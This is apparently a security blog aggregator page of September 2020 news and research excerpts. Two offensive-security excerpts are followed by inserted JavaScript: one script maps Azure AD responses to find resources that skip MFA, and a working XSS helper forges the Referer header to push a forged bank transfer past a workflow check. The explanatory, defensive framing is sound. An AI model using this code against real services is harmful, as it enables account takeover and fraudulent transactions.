Posts

Showing posts from September, 2020

Recorded Future - What to Expect at Predict 2020

On October 5 – 8, 2020, more than 5,000 security professionals from the most influential organizations and governments around the globe will attend the security intelligence event of the year — Predict. We hope you’re planning to join, as well! Recorded Future clients, partners, and anyone interested in using intelligence to disrupt the status quo won’t want to miss a minute of the exclusive thought leadership, education, networking, and fun we have in store for you! Check out the full agenda and register now. What’s Happening at Predict 2020 Join us at Predict next week to find out how security intelligence is being used to defend organizations and infrastructures against threat actors. You’ll hear directly from the security leaders and luminaries who are shaping the future of cybersecurity, and you’ll experience the incredible power a comprehensive security intelligence strategy brings to the organizations that adopt it. This year, Predict is an online event focused on usin...

Schneier - Negotiating with Ransomware Gangs

Really interesting conversation with someone who negotiates with ransomware gangs: For now, it seems that paying ransomware, while obviously risky and empowering/encouraging ransomware attackers, can perhaps be comported so as not to break any laws (like anti-terrorist laws, FCPA, conspiracy and others), and even if payment is arguably unlawful, seems unlikely to be prosecuted. Thus, the decision whether to pay or ignore a ransomware demand, seems less of a legal, and more of a practical, determination, almost like a cost-benefit analysis. The arguments for rendering a ransomware payment include: Payment is the least costly option; Payment is in the best interest of stakeholders (e.g. a hospital patient in desperate need of an immediate operation whose records are locked up); Payment can avoid being fined for losing important data; Payment means not losing highly confidential information; and Payment may mean not going public with the data breach. The arguments against re...

SANS - Issue #77 - Volume XXII - SANS Newsbites - September 29th, 2020

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/77

Krebs - Who’s Behind Monday’s 14-State 911 Outage?

Emergency 911 systems were down for more than an hour on Monday in towns and cities across 14 U.S. states. The outages led many news outlets to speculate the problem was related to Microsoft’s Azure web services platform, which also was struggling with a widespread outage at the time. However, multiple sources tell KrebsOnSecurity the 911 issues stemmed from some kind of technical snafu involving Intrado and Lumen, two companies that together handle 911 calls for a broad swath of the United States. Image: West.com On the afternoon of Monday, Sept. 28, several states including Arizona, California, Colorado, Delaware, Florida, Illinois, Indiana, Minnesota, Nevada, North Carolina, North Dakota, Ohio, Pennsylvania and Washington reported 911 outages in various cities and localities. Multiple news reports suggested the outages might have been related to an ongoing service disruption at Microsoft. But a spokesperson for the software giant told KrebsOnSecurity, “we’ve seen no indicat...

Recorded Future - How Security Intelligence Protects Sensitive Retail Data

Neiman Marcus… Target… Home Depot… Panera Bread… Macy’s: These retailers are among the most famous brands that have suffered major cyberattacks. It doesn’t end there. Just recently, fashion brand H&M apologized and could face a fine of close to $1 billion for data protection breaches that involved illegally stored employee data. Defending Data and Digital Assets: A Major Challenge for Retailers One reason why retailers are frequently victimized by cyberattacks is because they must cater to a large customer base of connected consumers. Those customers are not always savvy when it comes to protecting log-in credentials. Any customer that provides a cybercriminal with an easy entryway to a retailer’s website or mobile app just might make that retailer’s digital assets vulnerable to a full-blown cyberattack. Retail organizations process high volumes of financial transactions and store customer data in multiple databases, as well. In addition, retailers deploy many endpoints throug...

Black Hills InfoSec - Exploiting MFA Inconsistencies on Microsoft Services

Beau Bullock // Overview On offensive engagements, such as penetration tests and red team assessments, I have been seeing inconsistencies in how MFA is applied to the various Microsoft services. Across Microsoft 365 and Azure, there are multiple endpoints. These endpoints can all be configured under different Conditional Access policy settings, which sometimes lead to […] The post Exploiting MFA Inconsistencies on Microsoft Services appeared first on Black Hills Information Security . from Black Hills Information Security https://www.blackhillsinfosec.com/exploiting-mfa-inconsistencies-on-microsoft-services/
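The excerpt stops before showing how such inconsistencies are found. The following is an added example, not Black Hills' code: given the token-endpoint responses collected for one set of credentials against several Microsoft resources, it classifies each response by its AADSTS error code and flags any endpoint that handed out a token while others demanded MFA for the same account. The response bodies and endpoint labels are constructed for the example; the AADSTS codes and the `error_description` format are the ones Azure AD actually returns.

```javascript
// Added example (not from the Black Hills post). Triage of Azure AD token-endpoint
// responses gathered per resource for the same username/password, to spot
// resources where a Conditional Access / MFA policy does not apply.

// Real AADSTS codes that appear at the start of error_description.
const AADSTS = {
  '50076': 'mfa_required',                  // MFA challenge (per-user MFA or CA policy)
  '50079': 'mfa_enrollment_required',       // MFA enforced but user not yet enrolled
  '53003': 'blocked_by_conditional_access', // CA policy blocked the sign-in outright
  '50126': 'invalid_credentials',           // wrong username or password
  '50053': 'account_locked',                // smart lockout
  '50057': 'account_disabled',
};

// Map one token response to a coarse outcome.
function classifyTokenResponse(resp) {
  if (resp && resp.access_token) return 'token_issued';
  const m = /AADSTS(\d+)/.exec((resp && resp.error_description) || '');
  return (m && AADSTS[m[1]]) || 'other_error';
}

// results: [{ endpoint, response }] for the SAME credentials. An MFA gap is
// any endpoint that issued a token while at least one other endpoint
// challenged for MFA or was blocked by Conditional Access.
function findMfaGaps(results) {
  const classified = results.map((r) => ({
    endpoint: r.endpoint,
    outcome: classifyTokenResponse(r.response),
  }));
  const enforced = classified.filter(
    (c) => c.outcome.startsWith('mfa_') || c.outcome === 'blocked_by_conditional_access',
  );
  const bypass = classified.filter((c) => c.outcome === 'token_issued');
  return {
    classified,
    credentialsValid: enforced.length > 0 || bypass.length > 0,
    inconsistent: enforced.length > 0 && bypass.length > 0,
    bypass: bypass.map((b) => b.endpoint),
  };
}

// Constructed sample: four responses for one account. The resource names are
// illustrative labels, not client IDs or URLs.
const SAMPLE_RESULTS = [
  {
    endpoint: 'Microsoft Graph',
    response: {
      error: 'interaction_required',
      error_description:
        'AADSTS50076: Due to a configuration change made by your administrator, or because you moved to a new location, you must use multi-factor authentication to access the resource.',
    },
  },
  {
    endpoint: 'Azure Service Management',
    response: {
      error: 'interaction_required',
      error_description: 'AADSTS50076: Due to a configuration change made by your administrator, you must use multi-factor authentication.',
    },
  },
  {
    endpoint: 'Exchange Web Services',
    response: { token_type: 'Bearer', access_token: 'eyJ0eXAi.constructed.token' },
  },
  {
    endpoint: 'Microsoft Graph (wrong password, control)',
    response: {
      error: 'invalid_grant',
      error_description: 'AADSTS50126: Error validating credentials due to invalid username or password.',
    },
  },
];

function demo() {
  return findMfaGaps(SAMPLE_RESULTS);
}

// Running stand-alone prints the gap report.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The `credentialsValid` flag matters on an engagement: an MFA challenge confirms the password even though no token came back, which is the same signal a blind password-spray tool looks for. The interesting finding is `inconsistent: true` with a non-empty `bypass` list, meaning the policy protecting one resource did not cover another.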

TrustedSec - Setting the ‘Referer’ Header Using JavaScript

Or, “I’m Sorry, You Said You’re from Where Again?” In a prior webinar on creating weaponized Cross-Site Scripting (XSS) payloads, I mentioned that XSS payloads (written in JavaScript) could not change the HTTP Referer header. Malicious requests made through an XSS payload will often have an unexpected Referer header that does not generally make sense in the normal workflow of the application. Fortunately, the application used in that particular demonstration was not checking the Referer header. Our malicious payload worked even though the Referer was wildly incorrect. It turns out that I lied to you dear readers—not intentionally of course. Figure 1 – I Was Wrong! It turns out that you can, in fact, set the Referer header using JavaScript with a simple trick that I was not aware of at the time. But let’s backup a second. What is this Referer header, and why do I keep misspelling it? The Referer header is set by your browser and sent to the server when you request a p...
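The excerpt cuts off before the trick is named. As an added example that is not the post's code, the block below uses a standard browser mechanism: Referer is derived from the current document URL, and `history.replaceState()` can rewrite that URL (same origin only) before the request is made, so a payload can choose the path the server sees. The `win` parameter is an injected stand-in for `window` so the logic can run in Node; a real payload passes `window`. The fake window, the `bank.example` origin and the workflow check are constructed for the example.

```javascript
// Added example, not from the TrustedSec post. Forging the Referer of a request
// sent by a same-origin script by rewriting the document URL first.

async function fetchWithForgedReferer(win, refererPath, targetPath, init = {}) {
  const original = win.location.href;
  // replaceState() throws on a cross-origin URL, so only the path and query
  // of the current origin can be forged (which is exactly what a workflow
  // check on the Referer path cares about).
  const forged = new URL(refererPath, original).href;
  win.history.replaceState(null, '', forged);
  try {
    // Same-origin requests carry the full document URL as Referer under the
    // default referrer policy, so the server sees the forged path.
    return await win.fetch(new URL(targetPath, original).href, init);
  } finally {
    win.history.replaceState(null, '', original); // leave the address bar as it was
  }
}

// Hypothetical server-side check of the kind this defeats: "the request must
// come from the transfer form page".
function refererMatchesWorkflow(refererHeader, expectedPath, origin) {
  if (!refererHeader) return false;
  const u = new URL(refererHeader);
  return u.origin === origin && u.pathname === expectedPath;
}

// Constructed stand-in for window: replaceState updates location.href, and
// fetch records the document URL at send time, which is what a browser would
// place in the Referer header.
function makeFakeWindow(startUrl) {
  const requests = [];
  const win = {
    location: { href: startUrl },
    history: {
      replaceState(_state, _title, url) {
        if (new URL(url).origin !== new URL(win.location.href).origin) {
          throw new Error('SecurityError: replaceState with a cross-origin URL');
        }
        win.location.href = url;
      },
    },
    async fetch(url, init) {
      requests.push({ url, method: (init && init.method) || 'GET', referer: win.location.href });
      return { ok: true, status: 200 };
    },
  };
  return { win, requests };
}

async function demo() {
  const origin = 'https://bank.example';
  // The XSS fires on the profile page, so an ordinary request from the payload
  // carries /profile?xss=1 as Referer, which the workflow check rejects.
  const { win, requests } = makeFakeWindow(origin + '/profile?xss=1');
  await win.fetch(origin + '/api/transfer', { method: 'POST' });
  await fetchWithForgedReferer(win, '/transfer-form', '/api/transfer', { method: 'POST' });
  return {
    plainReferer: requests[0].referer,
    forgedReferer: requests[1].referer,
    plainPasses: refererMatchesWorkflow(requests[0].referer, '/transfer-form', origin),
    forgedPasses: refererMatchesWorkflow(requests[1].referer, '/transfer-form', origin),
    restoredUrl: win.location.href,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  demo().then((r) => console.log(r));
}
```

The defensive takeaway is the converse of the trick: a Referer path check stops cross-site requests at best, never requests issued by script already running on the origin, so it is no substitute for anti-CSRF tokens and output encoding that prevents the XSS in the first place.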

Schneier - Hacking a Coffee Maker

As expected, IoT devices are filled with vulnerabilities: As a thought experiment, Martin Hron, a researcher at security company Avast, reverse engineered one of the older coffee makers to see what kinds of hacks he could do with it. After just a week of effort, the unqualified answer was: quite a lot. Specifically, he could trigger the coffee maker to turn on the burner, dispense water, spin the bean grinder, and display a ransom message, all while beeping repeatedly. Oh, and by the way, the only way to stop the chaos was to unplug the power cord. […] In any event, Hron said the ransom attack is just the beginning of what an attacker could do. With more work, he believes, an attacker could program a coffee maker — and possibly other appliances made by Smarter — to attack the router, computers, or other devices connected to the same network. And the attacker could probably do it with no overt sign anything was amiss. from Schneier on Security https://www.schneier.com/blog/ar...

Recorded Future - Delivering Maximum Impact in the Public Sector

Our guest is Michael Anderson, chief information security officer for Dallas County — the eighth largest county in the United States. He oversees the IT security program for over 6,800 county employees and the electronic records for over 2.6 million residents. Michael shares his career journey, including 10 years served in the Army in the Intelligence Corp, and over 20 years of strategic and tactical expertise across a wide range of IT disciplines. We’ll find out how he and his team use modern tools to make the most of limited resources, the type of leadership style he uses to inspire and motivate his coworkers, and how he approaches hiring in a highly competitive jobs market. This podcast was produced in partnership with the CyberWire. The post Delivering Maximum Impact in the Public Sector appeared first on Recorded Future. from Recorded Future https://www.recordedfuture.com/podcast-episode-177/

Schneier - On Executive Order 12333

Mark Jaycox has written a long article on the US Executive Order 12333: “ No Oversight, No Limits, No Worries: A Primer on Presidential Spying and Executive Order 12,333 “: Abstract : Executive Order 12,333 (“EO 12333”) is a 1980s Executive Order signed by President Ronald Reagan that, among other things, establishes an overarching policy framework for the Executive Branch’s spying powers. Although electronic surveillance programs authorized by EO 12333 generally target foreign intelligence from foreign targets, its permissive targeting standards allow for the substantial collection of Americans’ communications containing little to no foreign intelligence value. This fact alone necessitates closer inspection. This working draft conducts such an inspection by collecting and coalescing the various declassifications, disclosures, legislative investigations, and news reports concerning EO 12333 electronic surveillance programs in order to provide a better understanding of how the Execut...

SANS - Issue #76 - Volume XXII - SANS Newsbites - September 25th, 2020

from SANS Institute | Newsletters - Newsbites - RSS https://www.sans.org/newsletters/newsbites/xxii/76

Schneier - Friday Squid Blogging: COVID-19 Found on Chinese Squid Packaging

I thought the virus doesn’t survive well on food packaging: Authorities in China’s northeastern Jilin province have found the novel coronavirus on the packaging of imported squid, health authorities in the city of Fuyu said on Sunday, urging anyone who may have bought it to get themselves tested. As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered. Read my blog posting guidelines here. from Schneier on Security https://www.schneier.com/blog/archives/2020/09/friday-squid-blogging-covid-19-found-on-chinese-squid-packaging.html

Krebs - Who is Tech Investor John Bernard?

John Bernard, the subject of a story here last week about a self-proclaimed millionaire investor who has bilked countless tech startups, appears to be a pseudonym for John Clifton Davies, a U.K. man who absconded from justice before being convicted on multiple counts of fraud in 2015. Prior to his conviction, Davies served 16 months in jail before being cleared of murdering his wife on their honeymoon in India. The Private Office of John Bernard, which advertises itself as a capital investment firm based in Switzerland, has for years been listed on multiple investment sites as the home of a millionaire who made his fortunes in the dot-com boom 20 years ago and who has oodles of cash to invest in tech startups. But as last week’s story noted, Bernard’s investment company is a bit like a bad slot machine that never pays out. KrebsOnSecurity interviewed multiple investment brokers who all told the same story: After promising to invest millions after one or two phone calls and with ...

Schneier - CEO of NS8 Charged with Securities Fraud

The founder and CEO of the Internet security company NS8 has been arrested and “charged in a Complaint in Manhattan federal court with securities fraud, fraud in the offer and sale of securities, and wire fraud.” I admit that I’ve never even heard of the company before. from Schneier on Security https://www.schneier.com/blog/archives/2020/09/ceo-of-ns8-charged-with-securities-fraud.html

Krebs - Microsoft: Attackers Exploiting ‘ZeroLogon’ Windows Flaw

Microsoft warned on Wednesday that malicious hackers are exploiting a particularly dangerous flaw in Windows Server systems that could be used to give attackers the keys to the kingdom inside a vulnerable corporate network. Microsoft’s warning comes just days after the U.S. Department of Homeland Security issued an emergency directive instructing all federal agencies to patch the vulnerability by Sept. 21 at the latest. DHS’s Cybersecurity and Infrastructure Security Agency (CISA) said in the directive that it expected imminent exploitation of the flaw — CVE-2020-1472, dubbed “ZeroLogon” — because exploit code which can be used to take advantage of it was circulating online. Last night, Microsoft’s Security Intelligence unit tweeted that the company is “tracking threat actor activity using exploits for the CVE-2020-1472 Netlogon vulnerability.” “We have observed attacks where public exploits have been incorporated into attacker playbooks,” Microsoft said. “We strongly recommend c...

HACKMAGEDDON - July 2020 Cyber Attacks Statistics

It's time to publish the statistics derived from the cyber attacks timeline of July (part I and part II). As previously mentioned, this month was characterized by ransomware (throughout the entire period, but we are used to that) and by mega breaches, a trend that resurfaced in the second half of the month. Predictably, these two shape the statistics of the month. from HACKMAGEDDON https://www.hackmageddon.com/2020/09/24/july-2020-cyber-attacks-statistics/

Recorded Future - Defend Your Physical Assets With Geopolitical Intelligence

Physical security teams and all-source analysts must continuously monitor for and report on new geopolitical event findings in real-time to effectively protect their organizations and assets. They need to respond swiftly to threats, but organizations are still susceptible to being blindsided at the most inopportune times because intelligence often lags. Relying on disparate data sources and manual processes means insights are often incomplete or outdated. Most analysts spend too much time manually collecting, analyzing, and visualizing a vast amount of intelligence — not to mention translating information from news sources in these regions’ local languages. To prevent and respond to geopolitical threats, teams need a more efficient and collaborative way to report on relevant insights that drive faster response times and informed decision-making. Geopolitical Intelligence in Action To effectively monitor geopolitical risks, open source and all-source analysts need geopolitical inte...

Schneier - Iranian Government Hacking Android

The New York Times wrote about a still-unreleased report from Check Point and the Miaan Group: The reports, which were reviewed by The New York Times in advance of their release, say that the hackers have successfully infiltrated what were thought to be secure mobile phones and computers belonging to the targets, overcoming obstacles created by encrypted applications such as Telegram and, according to Miaan, even gaining access to information on WhatsApp. Both are popular messaging tools in Iran. The hackers also have created malware disguised as Android applications, the reports said. It looks like the standard technique of getting the victim to open a document or application. from Schneier on Security https://www.schneier.com/blog/archives/2020/09/iranian-government-hacking-android.html

Krebs - Govt. Services Firm Tyler Technologies Hit in Apparent Ransomware Attack

Tyler Technologies, a Texas-based company that bills itself as the largest provider of software and technology services to the United States public sector, is battling a network intrusion that has disrupted its operations. The company declined to discuss the exact cause of the disruption, but their response so far is straight out of the playbook for responding to ransomware incidents. Plano, Texas-based Tyler Technologies [NYSE:TYL] has some 5,300 employees and brought in revenues of more than $1 billion in 2019. It sells a broad range of services to state and local governments, including appraisal and tax software, integrated software for courts and justice agencies, enterprise financial software systems, public safety software, records/document management software solutions and transportation software solutions for schools. Earlier today, the normal content on tylertech.com was replaced with a notice saying the site was offline. In a statement provided to KrebsOnSecurity after...

TrustedSec - Azure Account Hijacking using mimikatz’s lsadump::setntlm

Not long ago, I was on an engagement where the client made use of a hybrid Office 365 environment. In their setup, authentication credentials were managed by the on-premises Active Directory (AD) Domain Controller and then synced to Azure AD via Azure AD Connect. We were tasked with gaining access to sensitive customer information. And while we were able to obtain domain administrative privileges, we had a difficult time finding exactly where the target information resided. Normally in these instances, we research the employees of the organization, attempt to understand who they are, what roles they play, and how they operate from a day to day perspective. And while we were able to identify several key employees, we ran into two (2) problems: 1) the users did not store client data on their assigned working device and 2) the organization used cloud-based Office products to store client data, such as OneDrive, SharePoint, etc. Unfortunately, the users I targeted had chosen strong pass...

Recorded Future - 4 Things Nobody Tells You About Security Intelligence

Threat intelligence has huge potential to help organizations make better security decisions and reduce cyber risk. However, intelligence and security teams are often siloed, and intelligence outputs can lack relevance to the audiences they serve. As a result, the response to intelligence can be slow — if it comes at all. This is where elite security intelligence comes in. Security intelligence is the application of intelligence across the security function. It empowers organizations to realize operational improvements and reduce cyber risk by embedding intelligence into their security workflows. To shed some light on what security intelligence means for your organization, we asked senior leaders from Recorded Future to identify some things that most people don’t realize about security intelligence. #1 Security Intelligence Gives You Superpowers Most people in operational and leadership positions make decisions based on their own expertise and experience. They rarely have acc...